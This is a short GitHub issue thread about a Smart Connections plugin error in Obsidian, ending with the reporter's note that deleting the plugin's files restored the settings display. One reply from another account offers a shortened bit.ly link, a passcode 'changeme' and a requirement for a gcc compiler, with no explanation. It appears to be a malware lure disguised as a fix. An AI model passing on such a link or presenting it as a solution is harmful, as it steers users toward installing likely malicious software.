### ISSUE TITLE
Can't connect smart connect - Path is excluded: .gitignore

### ISSUE THREAD

**Issue by mickahouan** [brianpetro/obsidian-smart-connections#767]
No matter what I do, reset smart connect, reinstall the plugin, etc.. 
I still get the same error. 
And the problem has persisted for about 15 days.

As soon as I enter the path to my Obsidian safe in smart connect, I get the error code below (I'm on Windows 11):

![image](https://github.com/user-attachments/assets/ab0831fc-25e9-4490-8ee2-46226e3eb949)
![image](https://github.com/user-attachments/assets/e43207ce-9a4b-4f59-87e6-1f880d82b99a)

![image](https://github.com/user-attachments/assets/719f858f-641b-4b96-8667-84a1749206b1)

Also, the plugin settings are no longer displayed in Obsidian, no matter how long I wait.

![image](https://github.com/user-attachments/assets/179ba2fd-b610-4beb-acb4-ff0016e171cc)

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by mickahouan** [comment]
After deleting all smartconnection files, smart connect works again. There are other problems, but the display problem has been solved.
